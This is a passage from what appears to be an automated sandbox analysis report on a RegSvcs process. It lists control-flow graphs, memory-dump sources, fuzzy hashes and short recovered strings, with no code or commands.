386->352 388 4d4837a 386->388 388->352 388->386 390->372 397 4d485e2-4d485ec 391->397 398 4d485cc-4d485e0 391->398 399 4d485f6-4d485fc 397->399 398->399 401 4d48587-4d4859c 399->401 400->380 402 4d484f0 400->402 403 4d487b0-4d487db 401->403 404 4d485a2 401->404 402->380 402->391 402->400 402->403 405 4d484f7-4d48501 402->405 406 4d486bd-4d486de 402->406 407 4d486fd-4d4873c 402->407 408 4d485fe-4d48666 402->408 409 4d48741-4d48785 402->409 410 4d48582 402->410 411 4d48822 402->411 412 4d48849-4d488e5 402->412 413 4d4878a-4d487ab 402->413 414 4d4866b-4d486b8 402->414 434 4d487e1-4d487eb 403->434 435 4d48bf2-4d48c13 403->435 404->391 404->403 404->406 404->407 404->408 404->409 404->410 404->411 404->412 404->413 404->414 405->345 416 4d48507-4d48516 405->416 436 4d486e0-4d486eb 406->436 437 4d486ed-4d486f2 406->437 407->372 408->401 409->372 410->401 415 4d48827-4d4883c 411->415 412->415 413->401 414->401 415->372 420 4d48842 415->420 416->372 420->411 420->412 443 4d487f1-4d487fe 434->443 444 4d488ea-4d48906 434->444 460 4d48c15-4d48c20 435->460 461 4d48c22-4d48c27 435->461 438 4d486f8 436->438 437->438 438->401 443->444 446 4d48804-4d4881c 443->446 464 4d48909 444->464 446->411 463 4d48c2d 460->463 461->463 468 4d48cfc-4d48d07 463->468 466 4d48913-4d48927 464->466 469 4d4892d 466->469 470 4d48a59-4d48a5e 466->470 468->345 469->464 469->468 469->470 472 4d48934-4d4895b 469->472 473 4d489e7-4d48a0e 469->473 474 4d48a13-4d48a39 469->474 475 4d4898d-4d489e2 469->475 476 4d4895d-4d4898b 469->476 477 4d48a3e-4d48a54 469->477 470->372 472->466 473->466 474->466 475->466 476->466 477->466 494->318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ykk.$%a
                                        • API String ID: 0-2664548475
                                        • Opcode ID: 0cf4d0f8a254e5d365036a633b606e1111108e728192243e18deca9a910aff61
                                        • Instruction ID: 239ec51883e3d3fe22773f224f1a43995c86ae4691da9ab58dd4926e2a17eff6
                                        • Opcode Fuzzy Hash: 0cf4d0f8a254e5d365036a633b606e1111108e728192243e18deca9a910aff61
                                        • Instruction Fuzzy Hash: BD32AE74B00215CFDB64EF65C8A5BAAB7B2AB85340F1084E9E40AAB394DB31DD81DF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (o^q$Hbq
                                        • API String ID: 0-662517225
                                        • Opcode ID: 1575101a2991ad84f2cc52c8629bfb0592e8ea5c0dd2db24641198edd166f37b
                                        • Instruction ID: 6620ff10d487433360d0ac6a324f328c855c2c4a01856a20f8a673cd1eff1b6a
                                        • Opcode Fuzzy Hash: 1575101a2991ad84f2cc52c8629bfb0592e8ea5c0dd2db24641198edd166f37b
                                        • Instruction Fuzzy Hash: 8B126C71B002599FDB14DF69C894AAEBBF6BFC8300F148569E8499B391DF34AD42CB50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8307a400dc43845899c588edc64ebbaba62cdd04cd082f96045aff7f11765ca9
                                        • Instruction ID: 83dd6136145df81edd26ecc4f97cac6dba2bed740961a962a07f31cc494a3e02
                                        • Opcode Fuzzy Hash: 8307a400dc43845899c588edc64ebbaba62cdd04cd082f96045aff7f11765ca9
                                        • Instruction Fuzzy Hash: F57127357101008FC715DF78DA55A1A77A6FBC4310F10C4AAE94ADB394EA75FC02CBA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4de519fa6001113c45ceecfef7d7d7c1108cf461d819c0aa9ebec52d0fe068f
                                        • Instruction ID: 583d1b4e968635e98332c4119e66bddfb540ffbdb143fc564a3b78e5ab410a24
                                        • Opcode Fuzzy Hash: a4de519fa6001113c45ceecfef7d7d7c1108cf461d819c0aa9ebec52d0fe068f
                                        • Instruction Fuzzy Hash: E0612435710100CFC715DF38DA99A1A77A6FBC4314F14C8A6E94ADB3A4EA74EC06CBA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7deb9343c3a3f5e16a6094d30da51155f8317a489383081e0b16193a1f380215
                                        • Instruction ID: 129b3499828c1fe85861dcf451ef05bf41d34290567782301d9a95f0938086fc
                                        • Opcode Fuzzy Hash: 7deb9343c3a3f5e16a6094d30da51155f8317a489383081e0b16193a1f380215
                                        • Instruction Fuzzy Hash: 54316531B18245CFC702DFADEA51116FFA6EBD8210705C563D649CF395E630EC018B96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ec018873d4a40f64d29ef3214e8f215be5f4daa47346fc0c3bb05244b99cf7e
                                        • Instruction ID: bffbea8b63778cc437cd3a38af13ea06b3bcdb51fbdfd2f2af28d138274069b9
                                        • Opcode Fuzzy Hash: 8ec018873d4a40f64d29ef3214e8f215be5f4daa47346fc0c3bb05244b99cf7e
                                        • Instruction Fuzzy Hash: 3E315475B141418FC702DBB9EA41226FFA6EBD8310B09C56BD649CF355E630EC018B96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7fae9a0d642199ab750cabe6f3e0ddedeaf5f96cecc1930486ef391cbb5a2c1
                                        • Instruction ID: 26d4a656c4b36903e30e2aba0df997f8c30d3e27f4af489e3597441becf639c9
                                        • Opcode Fuzzy Hash: f7fae9a0d642199ab750cabe6f3e0ddedeaf5f96cecc1930486ef391cbb5a2c1
                                        • Instruction Fuzzy Hash: CA318F30B042418FD7466BB9591172FBEEB9FD2300F18595F9646EB3E5C9B0D9064F82

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 126 4d44c10-4d450fe 201 4d45104-4d45114 126->201 202 4d45650-4d45685 126->202 201->202 203 4d4511a-4d4512a 201->203 207 4d45687-4d4568c 202->207 208 4d45691-4d456af 202->208 203->202 204 4d45130-4d45140 203->204 204->202 206 4d45146-4d45156 204->206 206->202 209 4d4515c-4d4516c 206->209 210 4d45776-4d4577b 207->210 219 4d45726-4d45732 208->219 220 4d456b1-4d456bb 208->220 209->202 211 4d45172-4d45182 209->211 211->202 213 4d45188-4d45198 211->213 213->202 215 4d4519e-4d451ae 213->215 215->202 216 4d451b4-4d451c4 215->216 216->202 218 4d451ca-4d451da 216->218 218->202 221 4d451e0-4d4564f 218->221 226 4d45734-4d45740 219->226 227 4d45749-4d45755 219->227 220->219 225 4d456bd-4d456c9 220->225 234 4d456ee-4d456f1 225->234 235 4d456cb-4d456d6 225->235 226->227 237 4d45742-4d45747 226->237 232 4d45757-4d45763 227->232 233 4d4576c-4d4576e 227->233 232->233 246 4d45765-4d4576a 232->246 233->210 238 4d456f3-4d456ff 234->238 239 4d45708-4d45714 234->239 235->234 248 4d456d8-4d456e2 235->248 237->210 238->239 250 4d45701-4d45706 238->250 242 4d45716-4d4571d 239->242 243 4d4577c-4d4579e 239->243 242->243 247 4d4571f-4d45724 242->247 252 4d457a0 243->252 253 4d457ae 243->253 246->210 247->210 248->234 255 4d456e4-4d456e9 248->255 250->210 252->253 257 4d457a7-4d457ac 252->257 258 4d457b0-4d457b1 253->258 255->210 257->258
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: bbb39632bff41eb5ae55c3f675f00f0b084e96d7e3856c3b49ee7fb28bcfaafc
                                        • Instruction ID: 481e9f7a48a8913fac564f133ad8c8fb5682c3090a45b3892a4602fb7aeb6ca7
                                        • Opcode Fuzzy Hash: bbb39632bff41eb5ae55c3f675f00f0b084e96d7e3856c3b49ee7fb28bcfaafc
                                        • Instruction Fuzzy Hash: 44527334A00218DFEB549FA4C960B9EBB76FF84300F1085A9D10AAB365DE35AE85DF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 838 4d42428-4d4244a 839 4d42460-4d4246b 838->839 840 4d4244c-4d42450 838->840 843 4d42471-4d42473 839->843 844 4d42513-4d4253f 839->844 841 4d42452-4d4245e 840->841 842 4d42478-4d4247f 840->842 841->839 841->842 846 4d42481-4d42488 842->846 847 4d4249f-4d424a8 842->847 845 4d4250b-4d42510 843->845 851 4d42546-4d4259e 844->851 846->847 849 4d4248a-4d42495 846->849 946 4d424aa call 4d42428 847->946 947 4d424aa call 4d42419 847->947 849->851 852 4d4249b-4d4249d 849->852 850 4d424b0-4d424b2 853 4d424b4-4d424b8 850->853 854 4d424ba-4d424c2 850->854 870 4d425a0-4d425a6 851->870 871 4d425ad-4d425be 851->871 852->845 853->854 856 4d424d5-4d424f4 call 4d42de8 853->856 857 4d424c4-4d424c9 854->857 858 4d424d1-4d424d3 854->858 864 4d424f6-4d424ff 856->864 865 4d42509 856->865 857->858 858->845 943 4d42501 call 4d45c95 864->943 944 4d42501 call 4d45aaa 864->944 865->845 867 4d42507 867->845 870->871 873 4d425c4-4d425c8 871->873 874 4d42652-4d42654 871->874 875 4d425d8-4d425e5 873->875 876 4d425ca-4d425d6 873->876 941 4d42656 call 4d42428 874->941 942 4d42656 call 4d42419 874->942 882 4d425e7-4d425f1 875->882 876->882 877 4d4265c-4d42662 879 4d42664-4d4266a 877->879 880 4d4266e-4d42675 877->880 883 4d426d0-4d4272f 879->883 884 4d4266c 879->884 887 4d425f3-4d42602 882->887 888 4d4261e-4d42622 882->888 896 4d42736-4d42766 883->896 884->880 899 4d42604-4d4260b 887->899 900 4d42612-4d4261c 887->900 890 4d42624-4d4262a 888->890 891 4d4262e-4d42632 888->891 894 4d4262c 890->894 895 4d42678-4d426c9 890->895 891->880 892 4d42634-4d42638 891->892 892->896 897 4d4263e-4d42650 892->897 894->880 895->883 911 4d42768-4d42775 896->911 912 4d4278b-4d42798 896->912 897->880 899->900 900->888 917 4d42787-4d42789 911->917 918 4d42777-4d42785 911->918 920 4d4279a-4d427a4 912->920 917->920 918->920 925 4d427a6-4d427b4 920->925 926 4d427cc-4d427ce call 4d428d8 920->926 931 4d427b6-4d427ba 925->931 932 4d427c1-4d427ca 925->932 929 4d427d4-4d427d8 926->929 933 4d427f1-4d427f5 929->933 934 4d427da-4d427ef 929->934 931->932 932->926 935 4d427f7-4d4280c 933->935 936 4d42813-4d42819 933->936 934->936 935->936 941->877 942->877 943->867 944->867 946->850 947->850
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hbq$Hbq
                                        • API String ID: 0-4258043069
                                        • Opcode ID: c10697a195b8bad818e1910b85ceb9842c23322ee421df8f097f4e049e7df059
                                        • Instruction ID: 92418af0a6d6d628e988df91a5e169fea8dfa8f7ee96be1a6f563822aa56a58a
                                        • Opcode Fuzzy Hash: c10697a195b8bad818e1910b85ceb9842c23322ee421df8f097f4e049e7df059
                                        • Instruction Fuzzy Hash: B7C1A0353042518FCB159F39D898A2E7BA2FBC8351F1489A9E946CB395DF38DC42CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1072 4d428d8-4d428f5 1073 4d428f7-4d428fb 1072->1073 1074 4d428fd-4d428ff 1072->1074 1073->1074 1075 4d42904-4d4290f 1073->1075 1076 4d42b10-4d42b17 1074->1076 1077 4d42915-4d4291c 1075->1077 1078 4d42b18 1075->1078 1079 4d42ab1-4d42ab7 1077->1079 1080 4d42922-4d42931 1077->1080 1082 4d42b1d-4d42b55 1078->1082 1083 4d42abd-4d42ac1 1079->1083 1084 4d42ab9-4d42abb 1079->1084 1081 4d42937-4d42946 1080->1081 1080->1082 1090 4d42948-4d4294b 1081->1090 1091 4d4295b-4d4295e 1081->1091 1102 4d42b57-4d42b5c 1082->1102 1103 4d42b5e-4d42b62 1082->1103 1085 4d42ac3-4d42ac9 1083->1085 1086 4d42b0e 1083->1086 1084->1076 1085->1078 1088 4d42acb-4d42ace 1085->1088 1086->1076 1088->1078 1092 4d42ad0-4d42ae5 1088->1092 1093 4d4294d-4d42950 1090->1093 1094 4d4296a-4d42970 1090->1094 1091->1094 1095 4d42960-4d42963 1091->1095 1111 4d42ae7-4d42aed 1092->1111 1112 4d42b09-4d42b0c 1092->1112 1097 4d42956 1093->1097 1098 4d42a51-4d42a57 1093->1098 1104 4d42972-4d42978 1094->1104 1105 4d42988-4d429a5 1094->1105 1099 4d42965 1095->1099 1100 4d429b6-4d429bc 1095->1100 1108 4d42a7c-4d42a89 1097->1108 1106 4d42a6f-4d42a79 1098->1106 1107 4d42a59-4d42a5f 1098->1107 1099->1108 1109 4d429d4-4d429e6 1100->1109 1110 4d429be-4d429c4 1100->1110 1113 4d42b68-4d42b6a 1102->1113 1103->1113 1114 4d4297c-4d42986 1104->1114 1115 4d4297a 1104->1115 1144 4d429ae-4d429b1 1105->1144 1106->1108 1116 4d42a61 1107->1116 1117 4d42a63-4d42a6d 1107->1117 1135 4d42a9d-4d42a9f 1108->1135 1136 4d42a8b-4d42a8f 1108->1136 1130 4d429f6-4d42a19 1109->1130 1131 4d429e8-4d429f4 1109->1131 1119 4d429c6 1110->1119 1120 4d429c8-4d429d2 1110->1120 1121 4d42aff-4d42b02 1111->1121 1122 4d42aef-4d42afd 1111->1122 1112->1076 1123 4d42b6c-4d42b7e 1113->1123 1124 4d42b7f-4d42b86 1113->1124 1114->1105 1115->1105 1116->1106 1117->1106 1119->1109 1120->1109 1121->1078 1125 4d42b04-4d42b07 1121->1125 1122->1078 1122->1121 1125->1111 1125->1112 1130->1078 1148 4d42a1f-4d42a22 1130->1148 1146 4d42a41-4d42a4f 1131->1146 1139 4d42aa3-4d42aa6 1135->1139 1136->1135 1140 4d42a91-4d42a95 1136->1140 1139->1078 1141 4d42aa8-4d42aab 1139->1141 1140->1078 1145 4d42a9b 1140->1145 1141->1079 1141->1080 1144->1108 1145->1139 1146->1108 1148->1078 1150 4d42a28-4d42a3a 1148->1150 1150->1146
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,bq$,bq
                                        • API String ID: 0-2699258169
                                        • Opcode ID: da661b15159e6ce1e01ed7fb93e99cd35e357d8bde3dbc9809d7f67bd7badf46
                                        • Instruction ID: 1d4e2d76de05fec1df92870cf8e4c27a3cbb54a05d7c0d0f6798821a4722cbfb
                                        • Opcode Fuzzy Hash: da661b15159e6ce1e01ed7fb93e99cd35e357d8bde3dbc9809d7f67bd7badf46
                                        • Instruction Fuzzy Hash: 92819030B006058FCB14CF69C88996AB7B2BFC9380B1585E9E856EB3A5D731F841CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1431 4d440d0-4d44100 1433 4d44106-4d44123 1431->1433 1434 4d441ab-4d441bf 1431->1434 1458 4d44125-4d44130 1433->1458 1459 4d44132 1433->1459 1435 4d441c1-4d441c7 1434->1435 1436 4d4422e-4d44232 1434->1436 1435->1436 1439 4d441c9-4d441cc 1435->1439 1437 4d443a1-4d443ad 1436->1437 1438 4d44238-4d4423c 1436->1438 1445 4d443af-4d443b8 1437->1445 1446 4d443ba-4d443c0 1437->1446 1441 4d442c4-4d442c9 1438->1441 1442 4d44242-4d44248 1438->1442 1443 4d441d2-4d441df 1439->1443 1444 4d4466f-4d4469c 1439->1444 1447 4d442cf-4d442d2 1441->1447 1448 4d4466a 1441->1448 1442->1448 1449 4d4424e-4d44250 1442->1449 1443->1444 1450 4d441e5-4d441ff call 4d446c0 1443->1450 1478 4d446b5-4d446bc 1444->1478 1479 4d4469e-4d446b4 1444->1479 1445->1446 1451 4d443d5-4d443dc 1445->1451 1446->1448 1452 4d443c6-4d443d2 1446->1452 1454 4d442d4-4d442d6 1447->1454 1455 4d442db-4d442de 1447->1455 1448->1444 1456 4d44252-4d44255 1449->1456 1457 4d442ba-4d442bd 1449->1457 1468 4d44205-4d44208 1450->1468 1461 4d443e2-4d443eb 1451->1461 1462 4d44589-4d4458d 1451->1462 1452->1451 1465 4d44660-4d44667 1454->1465 1455->1444 1466 4d442e4-4d442f1 1455->1466 1456->1444 1467 4d4425b-4d44260 1456->1467 1470 4d442bf 1457->1470 1471 4d44269-4d4426c 1457->1471 1463 4d44134-4d44136 1458->1463 1459->1463 1461->1448 1464 4d443f1-4d443f4 1461->1464 1472 4d44593-4d4459c 1462->1472 1473 4d44648-4d4464c 1462->1473 1463->1434 1475 4d44138-4d4413c 1463->1475 1464->1448 1481 4d443fa-4d44410 1464->1481 1466->1444 1482 4d442f7-4d44307 1466->1482 1467->1457 1476 4d44262-4d44264 1467->1476 1485 4d44211-4d44214 1468->1485 1486 4d4420a-4d4420c 1468->1486 1480 4d44392-4d44398 1470->1480 1471->1444 1477 4d44272-4d4427f 1471->1477 1472->1448 1488 4d445a2-4d445a9 1472->1488 1483 4d4464e-4d44655 1473->1483 1484 4d4465b 1473->1484 1490 4d4413e-4d4414c call 4d43980 1475->1490 1491 4d4418b 1475->1491 1476->1465 1477->1444 1493 4d44285-4d442a8 1477->1493 1480->1448 1492 4d4439e 1480->1492 1507 4d44416-4d4441c 1481->1507 1508 4d4457e-4d44581 1481->1508 1482->1480 1509 4d4430d-4d44311 1482->1509 1483->1484 1494 4d44657-4d44659 1483->1494 1484->1465 1485->1448 1495 4d4421a-4d44220 1485->1495 1486->1465 1488->1473 1489 4d445af-4d445b5 1488->1489 1489->1444 1496 4d445bb-4d445c0 1489->1496 1490->1448 1511 4d44152-4d44155 1490->1511 1506 4d44193-4d441a2 1491->1506 1492->1437 1512 4d442b1-4d442b4 1493->1512 1513 4d442aa-4d442ac 1493->1513 1494->1465 1495->1448 1501 4d44226-4d4422c 1495->1501 1502 4d445c2-4d445c8 1496->1502 1503 4d4463a-4d4463d 1496->1503 1501->1435 1501->1436 1502->1444 1510 4d445ce-4d445df 1502->1510 1503->1448 1514 4d4463f-4d44642 1503->1514 1506->1434 1522 4d441a4-4d441a6 1506->1522 1507->1444 1515 4d44422-4d44435 1507->1515 1508->1462 1516 4d44313-4d4431c 1509->1516 1517 4d4438b-4d4438d 1509->1517 1524 4d445e7-4d445eb 1510->1524 1525 4d445e1-4d445e5 1510->1525 1511->1448 1518 4d4415b-4d44182 1511->1518 1512->1448 1512->1457 1513->1465 1514->1473 1514->1489 1527 4d44437-4d4443b 1515->1527 1528 4d44460-4d44466 1515->1528 1516->1444 1520 4d44322-4d4433e 1516->1520 1517->1465 1518->1506 1554 4d44184-4d44186 1518->1554 1520->1444 1534 4d44344-4d44369 1520->1534 1522->1465 1530 4d445f1-4d44633 1524->1530 1531 4d445ed-4d445ef 1524->1531 1525->1503 1532 4d44444-4d4445b 1527->1532 1533 4d4443d-4d4443f 1527->1533 1535 4d444be-4d444c7 1528->1535 1536 4d44468-4d4446c 1528->1536 1530->1503 1531->1465 1551 4d44569-4d4456c 1532->1551 1533->1465 1534->1444 1557 4d4436f-4d44382 1534->1557 1535->1444 1538 4d444cd-4d444d2 1535->1538 1539 4d44475-4d444b9 1536->1539 1540 4d4446e-4d44470 1536->1540 1542 4d444d4-4d444d8 1538->1542 1543 4d444fa-4d444fd 1538->1543 1539->1551 1540->1465 1548 4d444e1-4d444f8 1542->1548 1549 4d444da-4d444dc 1542->1549 1543->1444 1550 4d44503-4d44510 1543->1550 1548->1551 1549->1465 1550->1444 1555 4d44516-4d44539 1550->1555 1551->1448 1556 4d44572-4d44578 1551->1556 1554->1465 1564 4d44542-4d4454b 1555->1564 1565 4d4453b-4d4453d 1555->1565 1556->1507 1556->1508 1557->1517 1564->1444 1567 4d44551-4d4455c 1564->1567 1565->1465 1567->1444 1569 4d44562-4d44565 1567->1569 1569->1551
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (o^q
                                        • API String ID: 0-74704288
                                        • Opcode ID: 42ec1b65c5ef9b682b677834ea9ac2835215be6f46d700a147c0588c5aa4b300
                                        • Instruction ID: 776ea057e9c411524cef176f7958984c1e921646a7f799f605760f276728f91f
                                        • Opcode Fuzzy Hash: 42ec1b65c5ef9b682b677834ea9ac2835215be6f46d700a147c0588c5aa4b300
                                        • Instruction Fuzzy Hash: D4122830600609DFCB55CF68C588AAABBF2FBC8315F198A59E415AB2A1D734FD81CF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1571 4d402ad-4d40560 call 4d40138 1574 4d40565-4d4056a 1571->1574
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: a^q
                                        • API String ID: 0-3411664965
                                        • Opcode ID: 513038f08e839fcebf5bdc83118814ddf448d3fb8d7cde7d35930b0a0240b0e2
                                        • Instruction ID: 7e34ef23a716843c683ff9dc3413cf2b3f40f4dfb603ef8db3d7016c3105f1ce
                                        • Opcode Fuzzy Hash: 513038f08e839fcebf5bdc83118814ddf448d3fb8d7cde7d35930b0a0240b0e2
                                        • Instruction Fuzzy Hash: 68E0922270D3D11FC3079B6C5C90856BFE1AED625470909EFE5C0C7267C4148C19C3A1
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00B3EEEA), ref: 00B3EFD7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3278572933.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_b30000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 6a08ee7840ca926a9d64a891854caa6fdcfb3ba7678b0c38372138bbcfeadcb8
                                        • Instruction ID: ec5a3f976a2f81121943d717ec807d13ed1b04dabb8308fd516d3ccd4f723dd7
                                        • Opcode Fuzzy Hash: 6a08ee7840ca926a9d64a891854caa6fdcfb3ba7678b0c38372138bbcfeadcb8
                                        • Instruction Fuzzy Hash: A3219AB1C04299CFDB10CFAAD44479EFFF0AF48310F1084AAE454A7281D778A945CFA1
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00B3EEEA), ref: 00B3EFD7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3278572933.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_b30000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 3b64db52e45716f6a5cf8afd2b895e9b10469805faa358a5c1c6431989fde75c
                                        • Instruction ID: 843f35223e89f5fdaa91348258f2e785a84eb3ef9eda8f10d135f67741163948
                                        • Opcode Fuzzy Hash: 3b64db52e45716f6a5cf8afd2b895e9b10469805faa358a5c1c6431989fde75c
                                        • Instruction Fuzzy Hash: 6A11F4B1C006599BDB10DF9AD444B9EFBF4AB48320F10816AE414A7240D378A944CFA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q
                                        • API String ID: 0-1614139903
                                        • Opcode ID: 237354ab9f54713abc973053485edb61f7ea3ece136f7d5b881f993439f14bb6
                                        • Instruction ID: 08f2223b52e0fe62b4a88d0d2cdaffb50ae3fd02d01f575eac43420a85894f2b
                                        • Opcode Fuzzy Hash: 237354ab9f54713abc973053485edb61f7ea3ece136f7d5b881f993439f14bb6
                                        • Instruction Fuzzy Hash: 56619F313041558FCB14DF79C894B6A7BE9FFCA34471584AAE856CB2A5EB30EC81DB60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (o^q
                                        • API String ID: 0-74704288
                                        • Opcode ID: 84a9b8522d84ee3265281e3dc16471d170cc8e55426572960deeb0e60bfc12b9
                                        • Instruction ID: 26b8c783be4fbbc21501725dfb0de9dc867091b21dc2adb5010b3011950a7e77
                                        • Opcode Fuzzy Hash: 84a9b8522d84ee3265281e3dc16471d170cc8e55426572960deeb0e60bfc12b9
                                        • Instruction Fuzzy Hash: D751F731704244AFCB169B28E86476E7BB6FFC9310F1448AAE606DB391DE35EC02C751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q
                                        • API String ID: 0-1614139903
                                        • Opcode ID: 85f171361aec7b8ae2a12a8c49c21b05e98f9a4e706da5bd0f398a7c61e3d4eb
                                        • Instruction ID: ab17cae9f9dbffc9334667f815d56255e65c3f066f807763bebbd1502028083b
                                        • Opcode Fuzzy Hash: 85f171361aec7b8ae2a12a8c49c21b05e98f9a4e706da5bd0f398a7c61e3d4eb
                                        • Instruction Fuzzy Hash: 23415A756002558FCB14CF28D848B6E7BB2FF89311F1044A5E905DB3A1CB35ED92CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q
                                        • API String ID: 0-2625958711
                                        • Opcode ID: f46733d9221df4012428072404250eca6d0476ff1a2f06778b1f18e057d413b3
                                        • Instruction ID: 735693f04c476e94f6d182b415dc88f64eed053507c1acf8e8fd8039da2203a2
                                        • Opcode Fuzzy Hash: f46733d9221df4012428072404250eca6d0476ff1a2f06778b1f18e057d413b3
                                        • Instruction Fuzzy Hash: E4217931B151198FD796AE385C0222F71D3E7D4304F24447BEA4ADB390E930DC5187D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
